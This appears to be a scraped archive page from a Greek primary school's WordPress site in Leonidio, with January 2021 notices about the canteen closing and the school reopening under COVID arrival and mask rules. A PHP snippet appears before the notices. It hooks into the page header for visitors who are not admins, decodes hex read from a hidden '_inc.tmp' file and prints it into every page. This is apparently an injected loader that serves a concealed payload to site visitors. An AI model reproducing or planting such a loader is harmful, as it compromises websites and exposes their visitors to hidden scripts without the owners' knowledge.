if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Ιανουάριος, 2021 |

Monthly Archives: Ιανουάριος 2021

Προσωρινή αναστολή λειτουργίας κυλικείου

ΑΝΑΚΟΙΝΩΣΗ-ΕΝΗΜΕΡΩΣΗ!
Αγαπητοί γονείς και κηδεμόνες των μαθητών του Σχολείου μας,σας ενημερώνουμε ότι εκτάκτως από αύριο Τρίτη 19-01-2021 και για τουλάχιστον 10 ημέρες (σύμφωνα με εκτιμήσεις του Δήμου Ν. Κυνουρίας) το κυλικείο του σχολείου μας δε θα λειτουργεί, οπότε θα πρέπει οι μαθητές και οι μαθήτριες να φέρνουν το κολατσιό και το νερό τους από το σπίτι. Για την επαναλειτουργία του κυλικείου μας θα ενημερωθείτε εκ νέου εγκαίρως. Δημοτικό Σχολείο Λεωνιδίου

Επανέναρξη λειτουργίας του Σχολείου μας

Αγαπητοί γονείς & κηδεμόνες των μαθητών και των μαθητριών του Δημοτικού Σχολείου Λεωνιδίου,

οι εκπαιδευτικοί του σχολείου μας σας εύχονται χρόνια πολλά με υγεία και μια καλή δημιουργική και ελπιδοφόρα χρονιά!

Το σχολείο μας θα αρχίσει να λειτουργεί και πάλι κανονικά από τη Δευτέρα 11-01-2021 ως ακολούθως:

Το πρόγραμμα μαθημάτων για όλες τις τάξεις είναι αυτό που ίσχυε πριν τροποποιηθεί για τις ανάγκες της τηλεκπαίδευσης.

Η προσέλευση των μαθητών θα γίνεται και από τις δύο εισόδους του σχολείου ως εξής: Οι μαθητές των Α’-Γ’-Ε’-ΣΤ’ τάξεων από την κεντρική είσοδο του σχολείου ενώ οι μαθητές των Β’ & Δ’ τάξεων από την βοηθητική (πίσω) είσοδο. Με τον ίδιο τρόπο θα γίνεται και η αποχώρηση από το σχολείο.

Οι μαθητές και οι μαθήτριες των τάξεων Α’-Β’-Γ’ θα προσέρχονται στο σχολείο στις 8:00 πμ και τα μαθήματα θα ξεκινούν στις 8:05 πμ, ενώ θα αποχωρούν από το σχολείο στις 13:00.

Οι μαθητές και οι μαθήτριες των τάξεων Δ’-Ε’-ΣΤ’ θα προσέρχονται στο σχολείο στις 8:15 πμ και τα μαθήματα θα ξεκινούν στις 8:20 πμ, ενώ θα αποχωρούν από το σχολείο στις 13:15.

Τα αδελφάκια του σχολείου που ανήκουν σε διαφορετικές ομάδες τάξεων θα προσέρχονται στο σχολείο μαζί, στις 8:00 πμ και θα αποχωρούν μαζί στις 13:15. Τα παιδιά που σχολούν νωρίτερα θα παραμένουν στον χώρο του σχολείου υπό την επίβλεψη εκπαιδευτικών μέχρι να σχολάσει το/τα αδελφάκι/α τους. Τα ίδια ισχύουν και για τους μεταφερόμενους μαθητές.

Κατά την προσέλευση των μαθητών ο/η εκπαιδευτικός κάθε τάξης/τμήματος θα υποδέχεται τους μαθητές του/της σε συγκεκριμένο σημείο του προαυλίου και όταν προσέλθουν όλοι θα τους συνοδεύει στην αντίστοιχη τάξη.

Παρακαλούμε να τηρούνται αυστηρά τα παραπάνω ωράρια από γονείς και μαθητές ώστε να αποφύγουμε περιττούς και επικίνδυνους συνωστισμούς και συγχρωτισμούς.

Όλοι οι μαθητές θα πρέπει να έχουν μαζί τους μάσκα από το σπίτι, την οποία θα φορούν καθ’ όλη τη διάρκεια της παραμονής τους στο σχολείο (τόσο μέσα στην τάξη όσο και στα διαλείμματα), γι’ αυτό καλό θα ήταν να έχουν και ανταλλακτική/ές.

Καλή νέα αρχή και καλή χρονιά σε όλους!

Δημοτικό Σχολείο Λεωνιδίου